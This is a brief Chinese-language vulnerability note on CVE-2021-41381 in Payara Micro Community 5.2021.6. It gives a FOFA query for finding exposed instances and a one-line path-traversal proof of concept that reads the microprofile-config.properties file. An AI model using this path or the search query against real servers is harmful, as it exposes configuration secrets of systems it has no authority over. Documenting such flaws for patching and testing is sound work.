# PayaraMicro microprofile-config.properties 信息泄漏漏洞 CVE-2021-41381

## 漏洞描述

PayaraMicro microprofile-config.properties文件配置错误的情况下可被任意用户读取，获取敏感信息

## 漏洞影响

```
Payara Micro Community 5.2021.6
```

## FOFA

```
app="Payara-Micro"
```

## 漏洞复现

产品页面

![image-20220525163706617](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251637689.png)

验证POC

```
/.//WEB-INF/classes/META-INF/microprofile-config.properties
```

![image-20220525163715004](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251637074.png)